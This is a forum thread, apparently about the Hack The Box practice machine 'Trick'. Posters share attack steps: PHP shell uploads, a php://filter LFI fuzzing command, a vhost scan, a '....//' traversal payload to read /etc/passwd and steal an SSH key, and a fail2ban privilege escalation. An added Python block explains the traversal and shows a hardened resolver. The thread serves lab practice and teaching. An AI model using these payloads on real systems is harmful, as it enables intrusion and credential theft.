Trick HTB Discussion
[quote="11231123" pid="101664" dateline="1655627121"]If it is save_settings, is there any way we can bypass this to upload a shell? (unable to directory traversal with the file name)[code]Warning: move_uploaded_file(assets/img/1655626740_shell.php): failed to open stream: Permission denied in /var/www/payroll/admin_class.php on line 108

Warning: move_uploaded_file(): Unable to move '/tmp/phpw5CW6H' to 'assets/img/1655626740_shell.php' in /var/www/payroll/admin_class.php on line 108
[/code][/quote]How did you upload a file? Did you use Burp? Postman?
Reply
[quote="fironeDerbert" pid="101787" dateline="1655638810"][quote="11231123" pid="101664" dateline="1655627121"]If it is save_settings, is there any way we can bypass this to upload a shell? (unable to directory traversal with the file name)[code]Warning: move_uploaded_file(assets/img/1655626740_shell.php): failed to open stream: Permission denied in /var/www/payroll/admin_class.php on line 108

Warning: move_uploaded_file(): Unable to move '/tmp/phpw5CW6H' to 'assets/img/1655626740_shell.php' in /var/www/payroll/admin_class.php on line 108
[/code][/quote]How did you upload a file? Did you use Burp? Postman?[/quote]I used curl with the "-F" flag.

Reply
There is another subdomain; find the folder:

while read -r line; do echo "$line"; done < /usr/share/wordlist/dirb/small.txt | ffuf -u 'http://preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=../FUZZ/index' -w /dev/stdin -fs 9458


and guess the domain
Reply
(June 19, 2022, 12:10 PM)loge23 Wrote: There is another subdomain; find the folder:

while read -r line; do echo "$line"; done < /usr/share/wordlist/dirb/small.txt | ffuf -u 'http://preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=../FUZZ/index' -w /dev/stdin -fs 9458


and guess the domain

market?
Reply
(June 19, 2022, 12:23 PM)fironeDerbert Wrote:
(June 19, 2022, 12:10 PM)loge23 Wrote: There is another subdomain; find the folder:

while read -r line; do echo "$line"; done < /usr/share/wordlist/dirb/small.txt | ffuf -u 'http://preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=../FUZZ/index' -w /dev/stdin -fs 9458


and guess the domain

market?


Yes
while read -r line; do echo "preprod-$line" ; done < /usr/share/wordlist/dirb/small.txt | gobuster vhost -u http://trick.htb/ -w /dev/stdin
Reply
New subdomain: http://preprod-marketing.trick.htb
And LFI!
http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd

Take the id_rsa and get the SSH :D
Reply
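As an added illustration (not code from the thread or from the box), a Python model of why a `....//` segment like the one in the payload above survives a filter that strips `../` only once, placed beside a resolver that allowlists page names and canonicalizes the result before including anything. The one-pass filter shape, the web root and the allowlist are assumptions; the page shows only that the payload worked.

```python
"""Model of the '....//' traversal versus a canonicalizing, allowlisted resolver."""
import os
from typing import Optional

# Constructed stand-in for the app's include directory (assumption).
# Canonicalized so the containment check below compares like with like.
WEB_ROOT = os.path.realpath("/var/www/marketing")
ALLOWED_PAGES = {"home", "about", "contact"}  # constructed allowlist


def naive_sanitize(page: str) -> str:
    """Assumed filter: remove '../' once. In '....//' the match sits at
    offset 2, so removing it leaves '.' '.' '/' behind, i.e. a fresh '../'."""
    return page.replace("../", "")


def naive_include_path(page: str) -> str:
    """Path the vulnerable pattern would hand to include(): sanitize, then join."""
    return os.path.normpath(os.path.join(WEB_ROOT, naive_sanitize(page)))


def safe_include_path(page: str) -> Optional[str]:
    """Hardened resolver: the client chooses only a name from a fixed set,
    the server builds the path, and the canonical result must stay under
    WEB_ROOT. Returns None when either check fails."""
    if page not in ALLOWED_PAGES:
        return None
    candidate = os.path.realpath(os.path.join(WEB_ROOT, page + ".html"))
    if os.path.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    return candidate


if __name__ == "__main__":
    payload = "....//....//....//etc/passwd"
    print("after one-pass strip:", naive_sanitize(payload))
    print("vulnerable resolver  :", naive_include_path(payload))
    print("hardened resolver    :", safe_include_path(payload))
    print("hardened, valid page :", safe_include_path("about"))
```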
(June 19, 2022, 12:51 PM)fironeDerbert Wrote: New subdomain: http://preprod-marketing.trick.htb
And LFI!
http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd

Take the id_rsa and get the SSH :D


You are welcome
Reply
I think the priv esc is with fail2ban.
We have 2 groups: michael and security.
We can run this as root: /etc/init.d/fail2ban restart
And this file, /etc/fail2ban/action.d, is owned by root:security.
Reply
Privesc: https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7
Reply
Can someone send a script that automates the 10 SSH fails within 10 seconds...
Reply

